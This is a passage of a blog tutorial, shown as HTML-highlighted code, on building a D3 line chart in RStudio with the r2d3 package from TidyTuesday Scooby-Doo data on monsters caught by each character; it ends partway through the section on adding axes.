&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;r2d3&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This allows you to write D3 in RStudio in two main ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;D3 chunks in an .Rmd file&lt;/li&gt;
&lt;li&gt;A D3 script - a &lt;code&gt;.js&lt;/code&gt; file with some autopopulated D3 code&lt;/li&gt;
&lt;/ul&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/r2d3-options.png" title = "r2d3 options" alt="Options for writing D3 in RStudio using r2d3" style="display: block; margin: auto;" /&gt;
&lt;p&gt;For this blog post, we will be writing our code in a separate .js file,
but we will be running it in an R Markdown chunk to preview it (However,
it is also possible to preview your code from the script directly, but
this way will hopefully show you how easily you can include D3
visualisations in an R Markdown report).&lt;/p&gt;
&lt;p&gt;So, we will start by creating two files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An R Markdown document: &lt;code&gt;scoobydoo.Rmd&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;A D3 script: &lt;code&gt;scoobydoo.js&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To ensure that the files are able to interact with each other, I
recommend working in an RStudio project (File &amp;gt; New Project) with both
files at the &lt;code&gt;.Rproj&lt;/code&gt; level.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-r-d3-intro-r2d3"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="data-cleaning-in-r"&gt;Data cleaning in R&lt;/h2&gt;
&lt;p&gt;You will need to install some packages for the cleaning steps, which you
can install with this line of code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;r2d3&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;stringr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tidytuesdayR&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In your .Rmd file, you can copy the following steps to load necessary
packages, read in the data, and clean it in preparation of our D3
visualisation. We won’t go through these steps as this blog post assumes
you know R and some basic Tidyverse already! If you don’t, &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;we offer
courses to help you get
started&lt;/a&gt;! You can
download the data we will be using manually from
&lt;a href="https://github.com/rfordatascience/tidytuesday/blob/master/data/2021/2021-07-13/scoobydoo.csv" rel="external"&gt;here&lt;/a&gt;
if you prefer reading it in from a CSV file.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in scoobydoo.Rmd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stringr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;lubridate&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# load data from tidytuesday&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tuesdata &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tidytuesdayR&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tt_load&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2021&lt;/span&gt;, week &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;29&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scoobydoo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tuesdata&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;scoobydoo
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# wrangling data into nice shape&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;monsters_caught &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; scoobydoo &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(date_aired, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;starts_with&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;caught&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;across&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;starts_with&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;caught&amp;#34;&lt;/span&gt;), &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.logical&lt;/span&gt;(.))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pivot_longer&lt;/span&gt;(cols &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; caught_fred&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;caught_not,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; names_to &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;character&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values_to &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;monsters_caught&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;(character &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;caught_not&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;caught_other&amp;#34;&lt;/span&gt;))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;year&lt;/span&gt;(date_aired), .keep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;unused&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(character, year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(caught &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(monsters_caught),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .groups &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;drop_last&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cumulative_caught &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cumsum&lt;/span&gt;(caught),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; character &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(character, &lt;span style="color:#a5d6ff"&gt;&amp;#34;caught_&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; character &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_to_title&lt;/span&gt;(character),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; character &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;recode&lt;/span&gt;(character, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Daphnie&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Daphne&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I recommend investigating the resulting columns of the data by printing
&lt;code&gt;monsters_caught&lt;/code&gt; at this stage, as it will help you better understand
the D3 code later on. You will see that there are 5 columns, &lt;code&gt;character&lt;/code&gt;
which contains the names of our Mystery Inc. members (Daphne, Fred,
Scooby, Shaggy, and Velma); &lt;code&gt;year&lt;/code&gt; which contains years between 1969 and
2021 obtained from when the episode was aired; &lt;code&gt;caught&lt;/code&gt; which contains
how many monsters were caught for each mystery member in each year and
&lt;code&gt;cumulative_caught&lt;/code&gt; which is the cumulative sum of monsters caught for
each member.&lt;/p&gt;
&lt;p&gt;We are going to add a final column which will contain a unique colour
for each character, so that our line chart will look a bit nicer. The
colours are represented by hex codes obtained from official artwork of
the characters.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# setting up colors for each character&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;character_hex &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tribble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; character, &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; color,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Fred&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#76a2ca&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Velma&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#cd7e05&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Scooby&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#966a00&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Shaggy&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#b2bb1b&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Daphne&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#7c68ae&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;monsters_caught &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; monsters_caught &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;inner_join&lt;/span&gt;(character_hex, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;character&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will also add a new chunk which includes the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;r2d3&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;r2d3&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; monsters_caught,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; script &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;scoobydoo.js&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d3_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;5&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;r2d3()&lt;/code&gt; function lets you communicate with our &lt;code&gt;scoobydoo.js&lt;/code&gt;
script using the &lt;code&gt;monsters_caught&lt;/code&gt; tibble that we’ve created in R. As
our script is currently empty, nothing shows up when you run this line.
After we add some new code to our &lt;code&gt;scoobydoo.js&lt;/code&gt; script we can go back
to &lt;code&gt;scoobydoo.Rmd&lt;/code&gt; and re-run this line to view the output. We are
specifying our D3 version as &lt;code&gt;5&lt;/code&gt; to ensure our code will continue to
work despite potentially breaking updates to D3.&lt;/p&gt;
&lt;h2 id="your-first-lines-of-d3"&gt;Your first lines of D3&lt;/h2&gt;
&lt;p&gt;Okay, let’s add some code to our D3 script. We are defining some
variables as constants that set up the size of our margins, plot width
and height, and some font and line sizes for later on. Defining our
constants at the top makes them easy to find and change if we want to
change the sizes throughout our script.&lt;/p&gt;
&lt;p&gt;Note: Comments in JavaScript are denoted by &lt;code&gt;//&lt;/code&gt;, and variable names are
often written in &lt;code&gt;camelCase&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Another important concept being introduced in the code below are
attributes. An SVG element has a number of properties and these can be
set as attributes. For example, here we are setting the width attribute
of the SVG as the width of our (upcoming) plot plus the left and the
right margin (white space around the plot). Finally, we set up a group
that will represent the plot inside our SVG element, and then move this
plot to start where the left and top margin end using the “transform”
attribute.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// in scoobydoo.js
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// set up constants used throughout script
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {top&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;80&lt;/span&gt;, right&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;, bottom&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;40&lt;/span&gt;, left&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; plotWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.left &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.right
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; plotHeight &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.top &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; margin.bottom
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; lineWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; mediumText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; bigText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;28&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// set width and height of svg element (plot + margin)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;svg.attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;width&amp;#34;&lt;/span&gt;, plotWidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.left &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.right)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;height&amp;#34;&lt;/span&gt;, plotHeight &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.top &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.bottom)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// create plot group and move it
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; plotGroup &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; svg.append(&lt;span style="color:#a5d6ff"&gt;&amp;#34;g&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .attr(&lt;span style="color:#a5d6ff"&gt;&amp;#34;transform&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;translate(&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.left &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; margin.top &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we run our &lt;code&gt;r2d3()&lt;/code&gt; line in R Markdown again, the output is still
empty, but if we right-click on the space below our chunk and click
“Inspect Element”, we can now see that there is indeed an SVG element
(everything inside the SVG tags &lt;code&gt;&amp;lt;svg&amp;gt; &amp;lt;/svg&amp;gt;&lt;/code&gt;), with the width and
height that we’ve provided in the SVG attributes. Getting comfortable
with using either the RStudio Developer Tools to inspect the element, or
inspecting it in a browser, will help you more easily understand D3
visualisations.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/inspect-element.png" title = "Inspect element" alt="Using 'Inspect Element' to better understand your code" style="display: block; margin: auto;" /&gt;
&lt;h2 id="adding-axes"&gt;Adding axes&lt;/h2&gt;
&lt;p&gt;Next, let’s create some axes. At the bottom of &lt;code&gt;scoobydoo.js&lt;/code&gt; we add the
lines defining the , add the following lines which define two functions
&lt;code&gt;xAxis&lt;/code&gt; and &lt;code&gt;yAxis&lt;/code&gt;. These will be used to scale our data to a
coordinate system.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// x-axis values to year range in data
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// x-axis goes from 0 to width of plot
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; xAxis &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; d3.scaleLinear()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .domain(d3.extent(data, d =&amp;gt; { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; d.year; }))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .range([ &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, plotWidth ]);
